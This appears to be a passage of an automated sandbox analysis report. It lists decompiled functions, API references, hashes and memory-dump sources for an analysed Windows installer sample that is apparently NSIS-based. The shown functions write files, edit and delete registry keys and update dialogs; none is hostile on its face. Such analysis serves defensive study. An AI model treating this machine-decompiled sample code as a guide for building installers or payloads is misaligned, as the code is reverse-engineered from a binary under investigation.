                                                                                • Instruction Fuzzy Hash: A511EF5180CB9029FB3216384D44BBBAFA8CB577A4F18407BE8C4722C2D67C5C828B6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403DF6, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403DF6(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                0x00403e08
                                                                                0x00403e9c
                                                                                0x00000000
                                                                                0x00403e9c
                                                                                0x00403e19
                                                                                0x00403e1d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403e23
                                                                                0x00403e2c
                                                                                0x00403e2f
                                                                                0x00403e2f
                                                                                0x00403e35
                                                                                0x00403e3b
                                                                                0x00403e3b
                                                                                0x00403e47
                                                                                0x00403e4d
                                                                                0x00403e54
                                                                                0x00403e57
                                                                                0x00403e5a
                                                                                0x00403e5c
                                                                                0x00403e5c
                                                                                0x00403e64
                                                                                0x00403e6a
                                                                                0x00403e6a
                                                                                0x00403e74
                                                                                0x00403e79
                                                                                0x00403e7c
                                                                                0x00403e81
                                                                                0x00403e84
                                                                                0x00403e84
                                                                                0x00403e94
                                                                                0x00403e94
                                                                                0x00000000

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                                                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E0040553D(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E00405695(_t52);
				_t27 = E004056B4(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423e94;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403080(_t47);
						E0040304E(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402E5B( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E00405675( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E5B(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                0x0040267c
                                                                                0x0040267e
                                                                                0x0040268a
                                                                                0x0040268d
                                                                                0x00402697
                                                                                0x0040269b
                                                                                0x0040269b
                                                                                0x004026a1
                                                                                0x004026ae
                                                                                0x004026b6
                                                                                0x004026b9
                                                                                0x004026bf
                                                                                0x004026cd
                                                                                0x004026d2
                                                                                0x004026d6
                                                                                0x004026d9
                                                                                0x004026e2
                                                                                0x004026ee
                                                                                0x004026f2
                                                                                0x004026f5
                                                                                0x004026ff
                                                                                0x0040271e
                                                                                0x00402706
                                                                                0x0040270b
                                                                                0x00402713
                                                                                0x00402716
                                                                                0x0040271b
                                                                                0x0040271b
                                                                                0x00402725
                                                                                0x00402725
                                                                                0x00402737
                                                                                0x0040273e
                                                                                0x00402750
                                                                                0x00402750
                                                                                0x00402756
                                                                                0x00402756
                                                                                0x00402761
                                                                                0x00402762
                                                                                0x00402766
                                                                                0x0040276a
                                                                                0x00402770
                                                                                0x00402770
                                                                                0x00402777
                                                                                0x00402164
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                • GlobalFree.KERNEL32 ref: 00402725
                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                • GlobalFree.KERNEL32 ref: 0040273E
                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                • String ID:
                                                                                • API String ID: 3294113728-0
                                                                                • Opcode ID: 6bd3722abf38b226b3bad014223e82745ddead1376c5efbf1be1a110f9ad6227
                                                                                • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                                                                • Opcode Fuzzy Hash: 6bd3722abf38b226b3bad014223e82745ddead1376c5efbf1be1a110f9ad6227
                                                                                • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404D7B, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404D7B(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423664;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f34;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059FF(0, _t39, 0x41fc50, 0x41fc50, _a4);
					}
					_t26 = lstrlenA(0x41fc50);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423648, 0x41fc50);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc50;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc50)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc50, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                0x00404d81
                                                                                0x00404d8d
                                                                                0x00404d90
                                                                                0x00404d96
                                                                                0x00404da2
                                                                                0x00404da5
                                                                                0x00404da8
                                                                                0x00404dae
                                                                                0x00404dae
                                                                                0x00404db4
                                                                                0x00404dbc
                                                                                0x00404dbf
                                                                                0x00404ddc
                                                                                0x00404de0
                                                                                0x00404de9
                                                                                0x00404de9
                                                                                0x00404df3
                                                                                0x00404dfc
                                                                                0x00404e08
                                                                                0x00404e0f
                                                                                0x00404e13
                                                                                0x00404e16
                                                                                0x00404e29
                                                                                0x00404e37
                                                                                0x00404e37
                                                                                0x00404e3b
                                                                                0x00404e3d
                                                                                0x00404e40
                                                                                0x00000000
                                                                                0x00404e40
                                                                                0x00404dc1
                                                                                0x00404dc9
                                                                                0x00404dd1
                                                                                0x00404dd7
                                                                                0x00000000
                                                                                0x00404dd7
                                                                                0x00404dd1
                                                                                0x00404dbf
                                                                                0x00404e4a

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                • lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                • lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                • SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                • SendMessageA.USER32 ref: 00404E0F
                                                                                • SendMessageA.USER32 ref: 00404E29
                                                                                • SendMessageA.USER32 ref: 00404E37
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2531174081-0
                                                                                • Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                                                                • Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040464A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040464A(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                0x00404658
                                                                                0x00404665
                                                                                0x0040466b
                                                                                0x004046a9
                                                                                0x004046a9
                                                                                0x004046b8
                                                                                0x004046bf
                                                                                0x00000000
                                                                                0x004046c1
                                                                                0x0040466d
                                                                                0x0040467c
                                                                                0x00404684
                                                                                0x00404687
                                                                                0x00404699
                                                                                0x0040469f
                                                                                0x004046a6
                                                                                0x00000000
                                                                                0x004046a6
                                                                                0x00000000

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                                                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402B3B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b018; // 0x7e00
					_t11 =  *0x41f028;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                0x00402b48
                                                                                0x00402b56
                                                                                0x00402b5c
                                                                                0x00402b5c
                                                                                0x00402b6a
                                                                                0x00402b6c
                                                                                0x00402b72
                                                                                0x00402b79
                                                                                0x00402b7b
                                                                                0x00402b7b
                                                                                0x00402b91
                                                                                0x00402ba1
                                                                                0x00402bb3
                                                                                0x00402bb3
                                                                                0x00402bbb

                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                • MulDiv.KERNEL32(00007E00,00000064,?), ref: 00402B81
                                                                                • wsprintfA.USER32 ref: 00402B91
                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                • SetDlgItemTextA.USER32 ref: 00402BB3
                                                                                Strings
                                                                                • verifying installer: %d%%, xrefs: 00402B8B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: verifying installer: %d%%
                                                                                • API String ID: 1451636040-82062127
                                                                                • Opcode ID: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                • Instruction ID: e41715c37a5330c5740685503c003044c4943c79b663b03d39d41db920bc543d
                                                                                • Opcode Fuzzy Hash: bd1d3871bc3dbc50f966d73cf0113ae7f1e1d2dda644773975aa317f12337262
                                                                                • Instruction Fuzzy Hash: 34014470A00209ABDB249F60DD09EAE3779AB04345F008039FA16B92D1D7B49A559F99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a350) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a350 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E5B( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a350, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a350, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f08 =  *0x423f08 +  *(_t37 - 4);
				return 0;
			}










                                                                                0x00402304
                                                                                0x00402309
                                                                                0x00402313
                                                                                0x0040231d
                                                                                0x00402320
                                                                                0x0040233a
                                                                                0x00402341
                                                                                0x00402349
                                                                                0x00402357
                                                                                0x0040235b
                                                                                0x00402366
                                                                                0x00402366
                                                                                0x0040236a
                                                                                0x0040236e
                                                                                0x00402374
                                                                                0x00402379
                                                                                0x00402379
                                                                                0x0040237d
                                                                                0x00402389
                                                                                0x00402389
                                                                                0x004023a2
                                                                                0x004023a4
                                                                                0x004023a4
                                                                                0x004023a7
                                                                                0x0040247d
                                                                                0x0040247d
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nss398D.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nss398D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nss398D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseCreateValuelstrlen
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nss398D.tmp
                                                                                • API String ID: 1356686001-3079632289
                                                                                • Opcode ID: 6eb7bd08c82c3e146a7733e807661265fef21126d087c27525dc6d7b7df67967
                                                                                • Instruction ID: 0c84a363429982d99d3a5a271a87b4b8d308e401ccf86a25fc22d5166c0076e5
                                                                                • Opcode Fuzzy Hash: 6eb7bd08c82c3e146a7733e807661265fef21126d087c27525dc6d7b7df67967
                                                                                • Instruction Fuzzy Hash: 781163B1E00209BFEB10AFA4DE49EAF767CFB40358F10413AF901B61D0D6B85D019669
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 84%
                                                                                			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f30 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405CFB(2);
					if(_t27 == 0) {
						if( *0x423f30 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f30, 0);
				}
				return _t18;
			}








                                                                                0x00402a57
                                                                                0x00402a5f
                                                                                0x00402a87
                                                                                0x00402a71
                                                                                0x00402ac1
                                                                                0x00402ac7
                                                                                0x00000000
                                                                                0x00402ac9
                                                                                0x00402a85
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402a85
                                                                                0x00402a9c
                                                                                0x00402aa4
                                                                                0x00402aab
                                                                                0x00402ad7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402adf
                                                                                0x00402ae7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ae7
                                                                                0x00000000
                                                                                0x00402aba
                                                                                0x00402ace

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: 0204ccc6243da5fb7d1e8e9f51d15d0a1ee9b60479d17a6698b5a350b3391530
                                                                                • Instruction ID: 5d1a371fa50838a3266b117963d7b66f71e0158893f1f1338f284f1558cfe321
                                                                                • Opcode Fuzzy Hash: 0204ccc6243da5fb7d1e8e9f51d15d0a1ee9b60479d17a6698b5a350b3391530
                                                                                • Instruction Fuzzy Hash: 73111771A10049BEEF31AF90DE49DAF7B7DEB44345B104036F906A10A0DBB49E51AE69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                0x00401ccb
                                                                                0x00401cd2
                                                                                0x00401d01
                                                                                0x00401d09
                                                                                0x00401d10
                                                                                0x00401d10
                                                                                0x0040288e
                                                                                0x0040289a

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.232381303.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.232365938.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232391183.0000000000407000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232396290.0000000000409000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232409652.0000000000417000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232414737.0000000000422000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232423171.0000000000429000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.232429022.000000000042C000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                • String ID:
                                                                                • API String ID: 1849352358-0
                                                                                • Opcode ID: 6cc92331e1a84e00b86faf76b0da97472e428bf09019f1db0eb92137fff79902
